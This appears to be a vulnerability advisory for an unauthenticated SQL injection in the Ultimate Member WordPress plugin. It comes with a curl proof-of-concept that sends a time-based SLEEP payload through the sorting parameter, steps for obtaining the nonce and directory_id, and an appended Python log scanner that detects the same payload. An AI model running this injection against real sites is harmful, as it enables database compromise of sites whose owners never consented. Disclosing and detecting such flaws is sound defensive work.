wpexploit / wpvulndb
WPEX-ID: DCCA7ED0-B088-4B7D-9E22-07B858367975
History: Feb 26, 2024 - 12:00 a.m.

Ultimate Member 2.1.3 - 2.8.2 - Unauthenticated SQL Injection


CVSS3: 9.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score: 9.8 High (Confidence: High)
EPSS: 0.001 Low (Percentile: 27.0%)

Description: The plugin does not sanitize and escape the sorting parameter before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks when the "Enable custom table for usermeta" option is enabled.

Requirement: "Enable custom table for usermeta" option to be enabled (Ultimate Member > Settings > Misc)

As an unauthenticated user, retrieve the nonce from the source of the homepage by searching for "var um_scripts". Then run the cURL command below and note the 5s delay in the response:

curl -X POST --data 'action=um_get_members&nonce=<NONCE>&directory_id=b9238&sorting=ID%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)' https://example.com/wp-admin/admin-ajax.php

PS: The directory_id is calculated via "SUBSTRING( MD5( POST_ID ), 11, 5)"; the value in the example above is for POST_ID=1.
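A defender-side detection check, added here and not part of the original advisory: it scans constructed request-body log lines (the "ip path body" format and its field layout are assumptions) for um_get_members calls whose sorting value is not a plain identifier, which is the shape of the injection shown above. The allowlist regex assumes legitimate sort keys are single tokens such as user_registered_desc; tune it to the values your site actually sends.

```python
import re
from urllib.parse import parse_qs

# Constructed sample lines in a hypothetical WAF/audit-log format:
# "<client_ip> <request_path> <raw POST body>" (body is percent-encoded, so no spaces).
SAMPLE_LOG = [
    "203.0.113.5 /wp-admin/admin-ajax.php action=um_get_members&nonce=abc123&directory_id=b9238&sorting=user_registered_desc",
    "203.0.113.9 /wp-admin/admin-ajax.php action=um_get_members&nonce=abc123&directory_id=b9238&sorting=ID%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)",
    "198.51.100.2 /wp-admin/admin-ajax.php action=heartbeat&data=x",
    "203.0.113.5 /wp-admin/admin-ajax.php action=um_get_members&nonce=abc123&directory_id=b9238&sorting=display_name",
]

# Assumption: a legitimate sort key is one column/keyword token (letters, digits, underscore).
# Anything with spaces, quotes, parentheses or comment markers cannot be a valid sort key.
SORT_TOKEN = re.compile(r"^[A-Za-z0-9_]+$")


def check_request(path: str, body: str):
    """Return a reason string if the request looks like an attempt against this bug, else None."""
    if not path.endswith("/wp-admin/admin-ajax.php"):
        return None
    params = parse_qs(body, keep_blank_values=True)  # percent-decodes values
    if params.get("action", [""])[0] != "um_get_members":
        return None
    for value in params.get("sorting", []):
        if not SORT_TOKEN.match(value):
            return f"non-identifier sorting value: {value!r}"
    return None


def scan_log(lines):
    """Return a list of (client_ip, reason) for every line that trips the check."""
    findings = []
    for line in lines:
        try:
            ip, path, body = line.split(" ", 2)
        except ValueError:
            continue  # malformed line; skip rather than crash the scan
        reason = check_request(path, body)
        if reason:
            findings.append((ip, reason))
    return findings


if __name__ == "__main__":
    for ip, reason in scan_log(SAMPLE_LOG):
        print(f"ALERT {ip}: {reason}")
```

Pair this with the mitigation the advisory implies: until the plugin is updated, disabling "Enable custom table for usermeta" removes the precondition for the injection.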
